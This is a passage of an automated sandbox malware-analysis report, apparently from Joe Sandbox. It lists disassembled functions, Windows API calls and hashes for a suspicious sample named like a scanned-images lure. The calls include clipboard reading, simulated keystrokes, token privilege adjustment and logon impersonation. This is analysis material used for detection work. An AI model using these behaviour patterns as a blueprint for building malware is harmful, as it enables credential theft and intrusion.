                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath_wcslen
                                                                                • String ID:
                                                                                • API String ID: 541455249-0
                                                                                • Opcode ID: ec3b41116186914c3087b6de08ba59543dda6686ca0dddcc43b85e5d74396574
                                                                                • Instruction ID: b3813515f1348c2ac89e49333c25e93f327d61641e06e34ca18d75f3502414e1
                                                                                • Opcode Fuzzy Hash: ec3b41116186914c3087b6de08ba59543dda6686ca0dddcc43b85e5d74396574
                                                                                • Instruction Fuzzy Hash: AFE0CD72A001245BCB1092599C46FEA77DDDFC8794F0500B6FD09D7259D974AD848554
                                                                                APIs
                                                                                  • Part of subcall function 00453837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00453908
                                                                                  • Part of subcall function 0045D730: GetInputState.USER32 ref: 0045D807
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00452B6B
                                                                                  • Part of subcall function 004530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0045314E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                • String ID:
                                                                                • API String ID: 3667716007-0
                                                                                • Opcode ID: 58e1617603b3498156d542c6da3c2ab4ee53e6c93790917be78fe63c31095165
                                                                                • Instruction ID: 311c8405c699b76d09896de26d6ee01353f826dbfb62dba082d4cd8c6736256f
                                                                                • Opcode Fuzzy Hash: 58e1617603b3498156d542c6da3c2ab4ee53e6c93790917be78fe63c31095165
                                                                                • Instruction Fuzzy Hash: B3E0262270024402CA08BF32A8524AEA7999FE239BF40143FF846831A3CE2C494E825D
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00490704,?,?,00000000,?,00490704,00000000,0000000C), ref: 004903B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: b841b5f9841a6a31ff49aa2214b9c9b803d76fe03a5d33a6fba41f71652427e1
                                                                                • Instruction ID: 41e867569942dd4c2af2621085654f525b1d514d630f7fd60b34fc218c90a9e6
                                                                                • Opcode Fuzzy Hash: b841b5f9841a6a31ff49aa2214b9c9b803d76fe03a5d33a6fba41f71652427e1
                                                                                • Instruction Fuzzy Hash: 50D06C3204014DBBDF028F84DD46EDA3FAAFB48714F014010BE1856021C732E822AB95
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00451CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem
                                                                                • String ID:
                                                                                • API String ID: 3098949447-0
                                                                                • Opcode ID: edd1eab9dda2fca5371daeff0941b5cffc8723caa7c4f548af05ec2db33ca9bb
                                                                                • Instruction ID: 63f487b4642e5a227f0ba0cab41c4bf1dc08bf45c4ab9a9faacce5b4714f74c4
                                                                                • Opcode Fuzzy Hash: edd1eab9dda2fca5371daeff0941b5cffc8723caa7c4f548af05ec2db33ca9bb
                                                                                • Instruction Fuzzy Hash: 3DC09B35380344BFF2248780BCCAF117755A77DB01F048401F6095D5E3C3A11415FB54
                                                                                APIs
                                                                                  • Part of subcall function 00455745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0045949C,?,00008000), ref: 00455773
                                                                                • GetLastError.KERNEL32(00000002,00000000), ref: 004C76DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 1214770103-0
                                                                                • Opcode ID: adee4f504084189d5a18a45201f7ec0418358afa361908444321e3ed9f8144ff
                                                                                • Instruction ID: b54e49926a575f786682fb7014f886729efdccee359c5284e136438fbb88e211
                                                                                • Opcode Fuzzy Hash: adee4f504084189d5a18a45201f7ec0418358afa361908444321e3ed9f8144ff
                                                                                • Instruction Fuzzy Hash: 258190342087019FC754EF29C491B6AB7E1AF48358F04495EFC865B392DB38AD49CF5A
APIs
• Sleep.KERNELBASE(000001F4), ref: 01572811
Memory Dump Source
• Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction ID: c4ac163cedb3b6a8af5070984620369ea41d733756b54b17982ecb108b5f9282
• Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction Fuzzy Hash: 2EE09A7494020DAFDB00EFA4E5496AE7BB4EF04311F1005A1FD0596681DA319A548A62
APIs
• CloseHandle.KERNELBASE(?,?,00000000,004924E0), ref: 00456266
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: ea493bc405342de2ba5669cb69390a17e8baa197d369a0ddc0528032ac5b77c7
• Instruction ID: 11e496870182bed1ebcac11ebe8c5e83ae8d9c3446ec5ecd31d4b1940be512d2
• Opcode Fuzzy Hash: ea493bc405342de2ba5669cb69390a17e8baa197d369a0ddc0528032ac5b77c7
• Instruction Fuzzy Hash: 49E0B675400B01CFC3319F1AE804412FBF6FFE13623214A6FE8E596661D3B4588A8F55
APIs
• Sleep.KERNELBASE(000001F4), ref: 01572811
Memory Dump Source
• Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: 61123221e4addccace2ea6983ee02afa27cfd2404fbcb2628a171785801526fd
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: EDE0E67494020DDFDB00EFB4D5496AE7FF4FF04301F100161FD01D2281D6319D508A62
APIs
  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004E961A
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004E965B
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 004E969F
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004E96C9
• SendMessageW.USER32 ref: 004E96F2
• GetKeyState.USER32(00000011), ref: 004E978B
• GetKeyState.USER32(00000009), ref: 004E9798
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004E97AE
• GetKeyState.USER32(00000010), ref: 004E97B8
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004E97E9
• SendMessageW.USER32 ref: 004E9810
• SendMessageW.USER32(?,00001030,?,004E7E95), ref: 004E9918
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004E992E
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004E9941
• SetCapture.USER32(?), ref: 004E994A
• ClientToScreen.USER32(?,?), ref: 004E99AF
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004E99BC
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004E99D6
• ReleaseCapture.USER32 ref: 004E99E1
• GetCursorPos.USER32(?), ref: 004E9A19
• ScreenToClient.USER32(?,?), ref: 004E9A26
• SendMessageW.USER32(?,00001012,00000000,?), ref: 004E9A80
• SendMessageW.USER32 ref: 004E9AAE
• SendMessageW.USER32(?,00001111,00000000,?), ref: 004E9AEB
• SendMessageW.USER32 ref: 004E9B1A
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004E9B3B
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 004E9B4A
• GetCursorPos.USER32(?), ref: 004E9B68
• ScreenToClient.USER32(?,?), ref: 004E9B75
• GetParent.USER32(?), ref: 004E9B93
• SendMessageW.USER32(?,00001012,00000000,?), ref: 004E9BFA
• SendMessageW.USER32 ref: 004E9C2B
• ClientToScreen.USER32(?,?), ref: 004E9C84
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004E9CB4
• SendMessageW.USER32(?,00001111,00000000,?), ref: 004E9CDE
• SendMessageW.USER32 ref: 004E9D01
• ClientToScreen.USER32(?,?), ref: 004E9D4E
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004E9D82
  • Part of subcall function 00469944: GetWindowLongW.USER32(?,000000EB), ref: 00469952
• GetWindowLongW.USER32(?,000000F0), ref: 004E9E05
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
• String ID: @GUI_DRAGID$F$p#R
• API String ID: 3429851547-1852618069
• Opcode ID: 3d9488a3f4dfaf2c87bd0ed0c58f60e2569490239354f7a57e17164979a33dfe
• Instruction ID: 6538b8c0ee4d959630ecdef6f938506b7e74973bb2340ced3714eaecb106ac75
• Opcode Fuzzy Hash: 3d9488a3f4dfaf2c87bd0ed0c58f60e2569490239354f7a57e17164979a33dfe
• Instruction Fuzzy Hash: 90428D70204281AFD724CF26CC84AABBBF5FF49315F14061AFA598B2E1D735AC55CB4A
APIs
• SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004E48F3
• SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 004E4908
• SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 004E4927
• SendMessageW.USER32(?,00000148,00000000,00000000), ref: 004E494B
• SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 004E495C
• SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 004E497B
• SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004E49AE
• SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004E49D4
• SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 004E4A0F
• SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004E4A56
• SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004E4A7E
• IsMenu.USER32(?), ref: 004E4A97
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004E4AF2
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004E4B20
• GetWindowLongW.USER32(?,000000F0), ref: 004E4B94
• SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 004E4BE3
• SendMessageW.USER32(00000000,00001001,00000000,?), ref: 004E4C82
• wsprintfW.USER32 ref: 004E4CAE
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004E4CC9
• GetWindowTextW.USER32(?,00000000,00000001), ref: 004E4CF1
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004E4D13
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004E4D33
• GetWindowTextW.USER32(?,00000000,00000001), ref: 004E4D5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
• String ID: %d/%02d/%02d
• API String ID: 4054740463-328681919
• Opcode ID: 6b52a4cfff7e2ddae4a88fa404c7d11271b93735a4c77d76b3b064d0d2661e8b
• Instruction ID: d2aab39d6b9359b45c2c0192ea6f817cd7a890055db4f8923af366142a917a3c
• Opcode Fuzzy Hash: 6b52a4cfff7e2ddae4a88fa404c7d11271b93735a4c77d76b3b064d0d2661e8b
• Instruction Fuzzy Hash: BC12F171900294ABEB248F36CC89FAF7BB8EF85711F10412AF915DB2D1D7789941CB58
APIs
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0046F998
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004AF474
• IsIconic.USER32(00000000), ref: 004AF47D
• ShowWindow.USER32(00000000,00000009), ref: 004AF48A
• SetForegroundWindow.USER32(00000000), ref: 004AF494
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004AF4AA
• GetCurrentThreadId.KERNEL32 ref: 004AF4B1
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004AF4BD
• AttachThreadInput.USER32(?,00000000,00000001), ref: 004AF4CE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 004AF4D6
• AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 004AF4DE
• SetForegroundWindow.USER32(00000000), ref: 004AF4E1
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF4F6
• keybd_event.USER32(00000012,00000000), ref: 004AF501
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF50B
• keybd_event.USER32(00000012,00000000), ref: 004AF510
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF519
• keybd_event.USER32(00000012,00000000), ref: 004AF51E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF528
• keybd_event.USER32(00000012,00000000), ref: 004AF52D
• SetForegroundWindow.USER32(00000000), ref: 004AF530
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 004AF557
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: a19bf409e1061dac75d92f49d337adf17e5d91df4d94d51bc02860ec355c0458
• Instruction ID: 2d6782e2a977b79f100172cc7694a7294bb5cc5dff254114117685ae812fd992
• Opcode Fuzzy Hash: a19bf409e1061dac75d92f49d337adf17e5d91df4d94d51bc02860ec355c0458
• Instruction Fuzzy Hash: 47315371A40258BFEB206BF55C89FBF7E6DEB45B50F100036FA00EA1D2C6B45D01AA69
APIs
  • Part of subcall function 004B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B170D
  • Part of subcall function 004B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B173A
  • Part of subcall function 004B16C3: GetLastError.KERNEL32 ref: 004B174A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 004B1286
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004B12A8
• CloseHandle.KERNEL32(?), ref: 004B12B9
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004B12D1
• GetProcessWindowStation.USER32 ref: 004B12EA
• SetProcessWindowStation.USER32(00000000), ref: 004B12F4
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004B1310
  • Part of subcall function 004B10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B11FC), ref: 004B10D4
  • Part of subcall function 004B10BF: CloseHandle.KERNEL32(?,?,004B11FC), ref: 004B10E9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0$ZQ
• API String ID: 22674027-4020664062
• Opcode ID: 43c8438cab20dc8d7304284673218b3cba4724e0f5347c05abbb01c8dac50bbe
• Instruction ID: 80187f8af2834ab8bfdff2b17d24ae08020c9ca974ba784fa4a042a3121954f1
• Opcode Fuzzy Hash: 43c8438cab20dc8d7304284673218b3cba4724e0f5347c05abbb01c8dac50bbe
• Instruction Fuzzy Hash: 0481A071900249AFDF209FA8DC99FEF7BB9EF04704F14412AF910A62A1D7398945CB29
                                                                                APIs
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B1114
                                                                                  • Part of subcall function 004B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1120
                                                                                  • Part of subcall function 004B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B112F
                                                                                  • Part of subcall function 004B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1136
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B0BCC
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B0C00
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0C17
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 004B0C51
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B0C6D
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0C84
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004B0C8C
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004B0C93
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B0CB4
                                                                                • CopySid.ADVAPI32(00000000), ref: 004B0CBB
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B0CEA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B0D0C
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B0D1E
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0D45
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D4C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0D55
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D5C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0D65
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D6C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004B0D78
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D7F
                                                                                  • Part of subcall function 004B1193: GetProcessHeap.KERNEL32(00000008,004B0BB1,?,00000000,?,004B0BB1,?), ref: 004B11A1
                                                                                  • Part of subcall function 004B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004B0BB1,?), ref: 004B11A8
                                                                                  • Part of subcall function 004B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004B0BB1,?), ref: 004B11B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                APIs
                                                                                • OpenClipboard.USER32(004ECC08), ref: 004CEB29
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004CEB37
                                                                                • GetClipboardData.USER32(0000000D), ref: 004CEB43
                                                                                • CloseClipboard.USER32 ref: 004CEB4F
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004CEB87
                                                                                • CloseClipboard.USER32 ref: 004CEB91
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004CEBBC
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 004CEBC9
                                                                                • GetClipboardData.USER32(00000001), ref: 004CEBD1
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004CEBE2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004CEC22
                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 004CEC38
                                                                                • GetClipboardData.USER32(0000000F), ref: 004CEC44
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004CEC55
                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 004CEC77
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004CEC94
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004CECD2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004CECF3
                                                                                • CountClipboardFormats.USER32 ref: 004CED14
                                                                                • CloseClipboard.USER32 ref: 004CED59
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                • String ID:
                                                                                • API String ID: 420908878-0
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004C69BE
                                                                                • FindClose.KERNEL32(00000000), ref: 004C6A12
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004C6A4E
